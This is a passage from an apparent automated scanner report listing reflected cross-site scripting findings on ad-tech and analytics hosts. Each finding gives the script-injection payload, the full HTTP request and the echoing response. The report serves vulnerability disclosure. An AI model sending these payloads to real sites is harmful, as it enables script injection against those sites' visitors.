tp://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426c4215"><script>alert(1)</script>69873abae82&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455
...[SNIP]...
4.33. http://as.chango.com/links/adunit/1.31759988192e+12 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the sig request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d27"><script>alert(1)</script>1cc8286ed8d was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad9336d27"><script>alert(1)</script>1cc8286ed8d HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "a5b401f71e5148799a6f2423b07d4cd73d521042"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:54 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:54 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:54 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
ose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad9336d27"><script>alert(1)</script>1cc8286ed8d&cu=&dsi=None&clickURL=">
...[SNIP]...
4.34. http://as.chango.com/links/adunit/1.31759988192e+12 [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d371f"><script>alert(1)</script>a5fc9f67176 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broadd371f"><script>alert(1)</script>a5fc9f67176&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "70973571812951c51d2d4496427748c19bd89484"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:40 GMT
Content-Length: 2361
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:40 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroadd371f%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ea5fc9f67176; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:40 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broadd371f"><script>alert(1)</script>a5fc9f67176&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickUR
...[SNIP]...
4.35. http://as.chango.com/links/adunit/1.31759988192e+12 [stid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the stid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b637"><script>alert(1)</script>76dda13d31e was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk1b637"><script>alert(1)</script>76dda13d31e&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "f33fc4f1aaa842e9b43349e461b453f890502a86"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:43 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:43 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk1b637%22%3E%3Cscript%3Ealert%281%29%3C/script%3E76dda13d31e%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:43 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599983.43;click1=http://as.chango.com/links/click1317599983.45?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk1b637"><script>alert(1)</script>76dda13d31e&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259
...[SNIP]...
4.36. http://as.chango.com/links/adunit/1.31759988192e+12 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c05"><script>alert(1)</script>f38714b81ab was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-livef3c05"><script>alert(1)</script>f38714b81ab&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "d3186fb91500f90491eca40b2def79ca69709121"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:50 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:50 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:50 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
d=1317599990.48;click1=http://as.chango.com/links/click1317599990.49?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-livef3c05"><script>alert(1)</script>f38714b81ab&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&
...[SNIP]...
4.37. http://as.chango.com/links/adunit/1.31759988192e+12 [wh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the wh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd2d"><script>alert(1)</script>60dd599054f was submitted in the wh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300afd2d"><script>alert(1)</script>60dd599054f&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Content-Length: 588
Server: Chango RTB Server
ETag: "56e6cc8d003260b1dbdb5eff69d7d20a9c15541b"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:51 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:51 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml
...[SNIP]...
<body style="width: 300afd2d"><script>alert(1)</script>60dd599054fpx; height: 250px; margin: 0; padding: 0;">
...[SNIP]...
4.38. http://as00.estara.com/as/InitiateCall2.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/InitiateCall2.php

Issue detail

The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80641'%3balert(1)//6c9e0c7792f was submitted in the template parameter. This input was echoed as 80641';alert(1)//6c9e0c7792f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/InitiateCall2.php?accountid=200106297609&template=85669580641'%3balert(1)//6c9e0c7792f&checklinkstatus=1&var2=912&var6=5860EEFA281121EC93852AEC182A3278&var7=912&var10=http%3A//travela.priceline.com/hotel/searchResults.do%3Fjsk%3D5463010a5064010a2011100300091519d011589950%26key%3Dgtapcnq5%26showDP%3Dy%26NYOPRedirNI%3Dnull HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEGFjLke6WJJNAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh98VLi0sK2lwYkF9cKjWXdEJSUbAVeUEmfbt9bc9z23--XB-7XiPa.b5v54oJuYNDTOS.bh.3a4Upc7bIKnpkFS4SWEdkFT0SOHgSjEhAsfc4xMhhn8PeTTwRI6yQqJNDDJI9yUb6oGKAvA.gPCGWjs5j3KkNQOUkiGRTzBGXFJFaIV3UC3CJhL2QLgYRT8QT9UQ9IU9okAwqRqropLRo5FRhpLRikF00kkCCuR2ik-JJj0qrGAQ9QSMkOY2CmnIMxndUDsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmG6IkxXhKmw4AsTjODqqGrkMYjL25VnOrHu.Q8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:23 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Length: 10170
Content-Type: application/x-javascript


var wv_available = true;
if (typeof(wv_available_vars) == 'undefined')
wv_available_vars = new Array();
wv_available_vars['85669580641';alert(1)//6c9e0c7792f'] = true;

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac
...[SNIP]...
4.39. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3f294<script>alert(1)</script>398e6a34688 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=83f294<script>alert(1)</script>398e6a34688&c2=6036211&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:48 GMT
Date: Sun, 02 Oct 2011 23:52:48 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"83f294<script>alert(1)</script>398e6a34688", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


4.40. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 724b2<script>alert(1)</script>af07be835b7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=724b2<script>alert(1)</script>af07be835b7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:54 GMT
Date: Sun, 02 Oct 2011 23:52:54 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"724b2<script>alert(1)</script>af07be835b7", c15:"", c16:"", r:""});


4.41. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 66acc<script>alert(1)</script>97f36e4c3b7 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=603621166acc<script>alert(1)</script>97f36e4c3b7&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:49 GMT
Date: Sun, 02 Oct 2011 23:52:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"603621166acc<script>alert(1)</script>97f36e4c3b7", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


4.42. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 1371e<script>alert(1)</script>3fbe42d830d was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=1371e<script>alert(1)</script>3fbe42d830d&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:50 GMT
Date: Sun, 02 Oct 2011 23:52:50 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"1371e<script>alert(1)</script>3fbe42d830d", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


4.43. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

